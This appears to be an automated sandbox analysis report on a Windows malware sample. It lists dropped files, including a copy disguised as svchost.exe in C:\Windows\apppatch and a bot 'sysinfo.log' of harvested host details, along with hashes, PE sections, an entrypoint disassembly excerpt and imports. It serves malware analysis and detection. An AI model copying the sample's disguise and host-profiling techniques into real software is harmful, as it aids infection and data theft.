                                                                                                                                                                                                                  Preview:<html>..<head>..<meta name="robots" content="noarchive" />..<meta name="googlebot" content="nosnippet" />..</head>..<body>..<div align=center>..<h3>Error. Page cannot be displayed. Please contact your service provider for more details. (10)</h3>..</div>..</body>..</html>

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\login[2].htm

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):173
                                                                                                                                                                                                                  Entropy (8bit):4.43096450882803
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                                  MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                                  SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                                  SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                                  SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\login[3].htm

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):173
                                                                                                                                                                                                                  Entropy (8bit):4.43096450882803
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                                  MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                                  SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                                  SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                                  SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\login[5].htm

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):173
                                                                                                                                                                                                                  Entropy (8bit):4.43096450882803
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                                  MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                                  SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                                  SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                                  SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\login[9].htm

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):173
                                                                                                                                                                                                                  Entropy (8bit):4.43096450882803
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                                  MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                                  SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                                  SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                                  SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\login[1].htm

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):114
                                                                                                                                                                                                                  Entropy (8bit):4.802925647778009
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                                  MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                                  SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                                  SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                                  SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\login[4].htm

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):173
                                                                                                                                                                                                                  Entropy (8bit):4.43096450882803
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                                  MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                                  SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                                  SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                                  SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\login[7].htm

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):173
                                                                                                                                                                                                                  Entropy (8bit):4.43096450882803
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                                  MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                                  SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                                  SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                                  SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\7f1bf99b\sysinfo.log

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):6238
                                                                                                                                                                                                                  Entropy (8bit):5.218070325458542
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:ehyRg64Zem1MWiYixeouiiqP77aqOXZ1CGxoZ5IfI0IXI7IKILIBI9I9IomIgIgT:eAd4XIxJEYS7Rzc6nclQm
                                                                                                                                                                                                                  MD5:BDE8185E4B45A90E46296BB071CBB425
                                                                                                                                                                                                                  SHA1:77BEED06250DC8D2E32CBDEAE06281CFABAABE1D
                                                                                                                                                                                                                  SHA-256:7E211D4682F544F04E09DCB6DD407F808C080D241ED70AE9B5E4C86C2028754A
                                                                                                                                                                                                                  SHA-512:A216A84CE4FD878BA69EB1A2A2E53D0DC92307F5DC62F35979D91CC48C6C5CBA5EC3A0B34E554C60B1F1963C949E1C05A5E83F81C5590246389551FBBDAE58E8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{BotVer: 4.0.1}.{Process: C:\Windows\apppatch\svchost.exe}.{Username: user}.{Processor: Intel64 Family 6 Model 143 Stepping 8, GenuineIntel}.{Language: ENG}.{Screen: 1280x1024@32}.{Date: 03:Dec:2024}.{Local time: 09:14:00}.{GMT: -5:00}.{Uptime: 21d 20h 48m}.{Windows directory: C:\Windows}.{Administrator: true}.IE history:.{http://go.microsoft.com/fwlink/p/?LinkId=255141}.netstat.{Proto.Local address.Remote address.State.TCP.0.0.0.0:135.0.0.0.0:0.LISTEN.TCP.0.0.0.0:445.0.0.0.0:0.LISTEN.TCP.0.0.0.0:5040.0.0.0.0:0.LISTEN.TCP.0.0.0.0:19706.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49664.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49665.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49666.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49667.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49668.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49669.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49670.0.0.0.0:0.LISTEN.TCP.0.0.0.0:64111.0.0.0.0:0.LISTEN.TCP.192.168.2.6:139.0.0.0.0:0.LISTEN.TCP.192.168.2.6:49480.1.1.1.1:53.TIME_WAIT.TCP.192.168.2.6:49482.2.23.209.182:80.TIME_WAIT.TCP.192.168.2.6:49697.192.168

                                                                                                                                                                                                                  C:\Windows\apppatch\svchost.exe

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\UMwpXhA46R.exe
                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                  Size (bytes):1179648
                                                                                                                                                                                                                  Entropy (8bit):6.468101493516739
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24576:C800kHPa2DfTNjx+mZCkt76f/24pN+XNqNG6hditW:l0riKf9Ckt7c20+9qNxUW
                                                                                                                                                                                                                  MD5:E132561B9EE04A2EDDF6460BE4A89362
                                                                                                                                                                                                                  SHA1:0DB3025D5EF4529738B05DC2A0148D83E7F660D9
                                                                                                                                                                                                                  SHA-256:ADF0EF04AF080030F6E91DA2B478CC52D85E3F9481C575012FBACA76CEFF6E1F
                                                                                                                                                                                                                  SHA-512:233138A7AF07E4755054A11B125AE49A6288E9BDA1974E4AD0A6DCA507F9C4BF9AF5E67FB85C763B7EFA3761A815F16A49FB500C0B615F0E523FF67F65DF6551
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".:.................2..........;........@....@...................................H.....................................R..........4............................................................................................................text...[0.......2.................. ..`.j......#k...P.......6..............@..@.nkytZ...............<..............@..@.N......hQ...P.......@..............@..@.fc.....&............N..............@....data....6...@...8...T..............@....s.......e..........................@....w..................................@....rsrc...4...........................@..@.reloc...............2..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Windows\apppatch\svchost.exe:Zone.Identifier

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\UMwpXhA46R.exe
                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                  Entropy (8bit):6.468102568684418
                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                  File name:UMwpXhA46R.exe
                                                                                                                                                                                                                  File size:1'179'648 bytes
                                                                                                                                                                                                                  MD5:239b74d7ac38014e61cc335630ac22d6
                                                                                                                                                                                                                  SHA1:ef7eacbab6cd35771675717a0a84939f529c1ac4
                                                                                                                                                                                                                  SHA256:a53ec0d01746cd6c44b9c207df3101c8fe7e78bbe08a125dad833b1a41636668
                                                                                                                                                                                                                  SHA512:8a43731dd67421634928f30b6e1cff9638867d6a16bcdf93126526b3eaec64d2c9a5b98fa85f0b9be094c6efd300ccb020c48f8c9920fd88dd87a8b87ca04a4f
                                                                                                                                                                                                                  SSDEEP:24576:L800kHPa2DfTNjx+mZCkt76f/24pN+XNqNG6hditW:w0riKf9Ckt7c20+9qNxUW
                                                                                                                                                                                                                  TLSH:EA451241B3D954C0E2338A7798BAD72098B6BDAC5B30CE5F4394765D1DB32E1B839E06
                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".:.................2..........;........@....@..................................X9f...................................

                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                  Icon Hash:004ab5b5d5b59535

                                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Entrypoint:0x401b3b
                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                  DLL Characteristics:
                                                                                                                                                                                                                  Time Stamp:0x3A11222E [Tue Nov 14 11:29:50 2000 UTC]
                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                  File Version Major:4
                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                  Import Hash:616d060f84174fbe550615d295f4ce51

                                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                  mov ecx, 00000000h
                                                                                                                                                                                                                  mov eax, ecx
                                                                                                                                                                                                                  call dword ptr [004150F8h]
                                                                                                                                                                                                                  mov dword ptr [00424B42h], eax
                                                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                                                  xor ebx, ebx
                                                                                                                                                                                                                  sub ebx, 0000010Ah
                                                                                                                                                                                                                  jnc 00007F13B4D5FB08h
                                                                                                                                                                                                                  add ebx, 00000D32h
                                                                                                                                                                                                                  mov ecx, ebx
                                                                                                                                                                                                                  shr ecx, 1
                                                                                                                                                                                                                  add ecx, esi
                                                                                                                                                                                                                  sub ecx, 00000222h
                                                                                                                                                                                                                  ror ecx, 05h
                                                                                                                                                                                                                  sub ecx, dword ptr [00425025h]
                                                                                                                                                                                                                  sub ecx, eax
                                                                                                                                                                                                                  sub dword ptr [00424AEDh], ecx
                                                                                                                                                                                                                  shr ecx, 1
                                                                                                                                                                                                                  add dword ptr [004250ADh], ecx
                                                                                                                                                                                                                  call 00007F13B4D60854h
                                                                                                                                                                                                                  mov dword ptr [00424377h], eax
                                                                                                                                                                                                                  push 00000001h
                                                                                                                                                                                                                  pop edx
                                                                                                                                                                                                                  push edx
                                                                                                                                                                                                                  mov ecx, 00486F5Ah
                                                                                                                                                                                                                  mov ebp, 00071E7Eh
                                                                                                                                                                                                                  mov eax, ebp
                                                                                                                                                                                                                  sub ecx, eax
                                                                                                                                                                                                                  call dword ptr [ecx]
                                                                                                                                                                                                                  mov dword ptr [00424170h], eax
                                                                                                                                                                                                                  mov esi, 0020A87Ch
                                                                                                                                                                                                                  mov eax, esi
                                                                                                                                                                                                                  shl eax, 1
                                                                                                                                                                                                                  call dword ptr [eax]
                                                                                                                                                                                                                  mov dword ptr [0042424Eh], eax
                                                                                                                                                                                                                  or eax, eax
                                                                                                                                                                                                                  jne 00007F13B4D5FB05h
                                                                                                                                                                                                                  mov edx, esi
                                                                                                                                                                                                                  dec edi
                                                                                                                                                                                                                  mov edi, 00000001h
                                                                                                                                                                                                                  mov eax, edi
                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                  mov ecx, 0020A86Ah
                                                                                                                                                                                                                  mov eax, ecx
                                                                                                                                                                                                                  shl eax, 1
                                                                                                                                                                                                                  call dword ptr [eax]
                                                                                                                                                                                                                  mov dword ptr [00425205h], eax
                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  mov eax, ebp
                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                  push esp
                                                                                                                                                                                                                  pop ebp
                                                                                                                                                                                                                  sub esp, 14h
                                                                                                                                                                                                                  lea eax, dword ptr [004245CCh]

                                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x152040xb4.N
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x5f0000x29434.rsrc
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x890000x3fe.reloc
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x1b5140x1c.fc
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                  Sections

                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                  .text0x10000x305b0x3200746849c22bd1df3ec913e6afd3261c01False0.700703125data6.211906712870064IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                  .j0x50000x6b230x6000ac67a98e2d3f6254b28e45da115c69bFalse0.96875data7.160260489225009IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                  .nkytZ0xc0000x8a0b0x400a47b6a356a3431ac9df3442ebc526efbFalse0.728515625data5.978528077403749IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                  .N0x150000x51680xe001dbd683313ed000c6b75f32744694ec5False0.47572544642857145data5.278775089069264IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                  .fc0x1b0000x8d260x60012c7d10915b83bfd9faa65fa82180001False0.736328125data5.748360690216942IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                  .data0x240000x36c00x38009a257e09d714d8ab48b690e8453afbd6False0.81298828125data6.7672572781458635IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                  .s0x280000x65bb0x80030f797c52e34fe45fded3dfd0de177a6False0.2587890625data2.075341234110115IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                  .w0x2f0000x2fd0b0x8001958d4f52ae8d506c6908df58c4a3a64False0.6533203125data5.386043783353626IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                  .rsrc0x5f0000x294340x29600496540dfc12657aab2ce18ca319f7ae5False0.9770404550604229data7.967828924738939IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                  .reloc0x890000x3fe0x400a91b09921b19daa6e0bdbe6b0aaccf90False0.939453125data6.753512294366748IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                  Resources

                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                  RT_ICON0x5f3100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4143996247654784
                                                                                                                                                                                                                  RT_DIALOG0x603b80x50dataEnglishUnited States1.0
                                                                                                                                                                                                                  RT_STRING0x604080x11adataEnglishUnited States0.7304964539007093
                                                                                                                                                                                                                  RT_STRING0x605240x114dataEnglishUnited States0.7282608695652174
                                                                                                                                                                                                                  RT_STRING0x606380x10cdataEnglishUnited States0.7388059701492538
                                                                                                                                                                                                                  RT_STRING0x607440x154dataEnglishUnited States0.6970588235294117
                                                                                                                                                                                                                  RT_STRING0x608980x11aTarga image data - Color 2 x 55 x 32 +42 +86 "\011"EnglishUnited States0.7269503546099291
                                                                                                                                                                                                                  RT_STRING0x609b40x16edataEnglishUnited States0.6857923497267759
                                                                                                                                                                                                                  RT_STRING0x60b240x132dataEnglishUnited States0.7124183006535948
                                                                                                                                                                                                                  RT_STRING0x60c580xfedataEnglishUnited States0.7480314960629921
                                                                                                                                                                                                                  RT_RCDATA0x60d580x27493dataEnglishUnited States1.0003480098188484
                                                                                                                                                                                                                  RT_GROUP_ICON0x881ec0x14dataEnglishUnited States1.1
                                                                                                                                                                                                                  RT_VERSION0x882000x234dataEnglishUnited States0.5336879432624113

                                                                                                                                                                                                                  Imports

                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                  kernel32.dllSetLocaleInfoA, lstrcpyn, CreateNamedPipeA, GetEnvironmentVariableA, GetExitCodeThread, OpenEventW, GetLogicalDriveStringsA, CopyFileExW, SetPriorityClass, GetProcAddress, CreateMutexA, CreateMutexW, QueryPerformanceCounter, CreateThread, SetUnhandledExceptionFilter, OpenMutexW, GetExitCodeProcess, GlobalGetAtomNameA, GetFileTime, GetCalendarInfoA, MulDiv, CreateFileMappingW, CreateMailslotA, FreeResource, LocalFree, DeleteAtom, GetVolumeInformationA, RaiseException, AddAtomA, GlobalFindAtomW, RemoveDirectoryW, GlobalFindAtomA, CreateMailslotW, GetProcessHeaps, EndUpdateResourceA, CopyFileExA, CreateNamedPipeW, SleepEx, GetModuleHandleA, WaitForSingleObject, GetSystemDefaultLangID, SetEvent, TlsAlloc, SetCalendarInfoW, GetLastError, GetFileSize, lstrlen, DuplicateHandle, GetAtomNameW, GetStringTypeW, CreateFileA
                                                                                                                                                                                                                  USER32.DLLCheckMenuItem, GetDC, DefDlgProcW, BringWindowToTop, GetDlgItem, EnumWindows, PeekMessageW, SetCursor, GetWindowLongA, MessageBoxIndirectW, CreatePopupMenu, keybd_event, GetWindowTextLengthA
